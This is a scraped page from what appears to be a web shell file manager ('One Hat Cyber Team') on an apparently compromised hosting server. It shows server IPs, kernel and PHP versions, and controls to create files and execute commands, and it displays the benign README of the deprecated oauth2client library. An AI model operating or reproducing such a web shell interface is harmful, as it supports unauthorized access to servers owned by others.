⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.118
Server IP:
2.57.91.184
Server:
Linux sg-nme-web1518.main-hosting.eu 5.14.0-611.16.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Mon Dec 22 03:40:39 EST 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.3.28
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
gsutil
/
gslib
/
vendored
/
oauth2client
/
View File Name :
README.md
[](https://travis-ci.org/google/oauth2client) [](https://coveralls.io/github/google/oauth2client?branch=master) [](https://oauth2client.readthedocs.io/) This is a client library for accessing resources protected by OAuth 2.0. **Note**: oauth2client is now deprecated. No more features will be added to the libraries and the core team is turning down support. We recommend you use [google-auth](https://google-auth.readthedocs.io) and [oauthlib](http://oauthlib.readthedocs.io/). For more details on the deprecation, see [oauth2client deprecation](https://google-auth.readthedocs.io/en/latest/oauth2client-deprecation.html). Installation ============ To install, simply run the following command in your terminal: ```bash $ pip install --upgrade oauth2client ``` Contributing ============ Please see the [CONTRIBUTING page][1] for more information. In particular, we love pull requests -- but please make sure to sign the contributor license agreement. Supported Python Versions ========================= We support Python 2.7 and 3.4+. More information [in the docs][2]. [1]: https://github.com/google/oauth2client/blob/master/CONTRIBUTING.md [2]: https://oauth2client.readthedocs.io/#supported-python-versions